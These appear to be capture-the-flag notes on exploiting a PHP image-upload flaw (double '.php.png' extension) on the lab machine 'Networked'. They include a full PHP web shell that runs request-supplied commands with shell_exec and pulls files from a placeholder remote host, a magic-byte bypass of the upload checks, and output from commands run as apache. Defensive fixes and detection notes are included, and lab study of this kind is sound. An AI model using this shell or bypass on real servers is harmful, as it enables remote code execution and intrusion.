3 :80 upload.php & lib.php

# file: upload.php
upload dir: /var/www/html/uploads/

POST submit:
	check_file_type => Content-Type: image/*
	check_file_size => size < 60000
	if either check fails: return "invalid image" and stop
	
	if valid image:
		name = IP(separated with '_').ext | 10_10_16_7.php.png 
		move uploaded file to upload_dir
		chmod 644 file

# file: lib.php
getnameUpload($filename) | k.php.png
	pieces = array(split on '.') | [k, php, png]
	name = pieces[0] | k
	name = replace '_' with '.' | k
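	ext = remaining pieces (after removing the 1st element) joined with '.' | php.png
	# note: ext is everything after the FIRST '.', so an inner ".php" survives into the stored name (10_10_16_7.php.png)
	# fix: allow-list the final extension only, store uploads under a server-generated name, and disable script execution for uploads/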
	return name, ext

# tried the basic shell
<?php
    // Test payload recorded in these notes: a PHP web shell with two independent branches,
    // both driven entirely by request parameters read through $_REQUEST.

    // Branch 1 - command execution: if a 'cmd' parameter is present, its value is passed
    // unmodified to shell_exec() and the command output is echoed back inside <pre> tags.
    // NOTE(review): on the host this should appear as the web server account spawning a
    // shell, and in access logs as a 'cmd' parameter on a request to a file under uploads/.
    if (isset($_REQUEST['cmd'])) {
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
    // Branch 2 - file staging: if an 'fupload' parameter is present, the script fetches
    // http://IP/<fupload> (IP is a placeholder in these notes) with file_get_contents() and
    // writes the response to a local path named by that same parameter.
    // NOTE(review): the fetch depends on outbound HTTP from the web server and on PHP being
    // allowed to open URLs; egress filtering and file-integrity monitoring of the web root
    // are the relevant controls.
    if (isset($_REQUEST['fupload'])) {
        file_put_contents($_REQUEST['fupload'], file_get_contents('http://IP/' . $_REQUEST['fupload']));
    };
?>

# can see the file but cannot run commands
# trying the webshell
# added 16 'X' characters at the top of the file
# used a hex editor to change the magic bytes
# upload successful >
http://networked.htb/uploads/10_10_16_7.php.png

CMD: whoami;id;hostname;uname -a
apache
uid=48(apache) gid=48(apache) groups=48(apache)
networked.htb
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
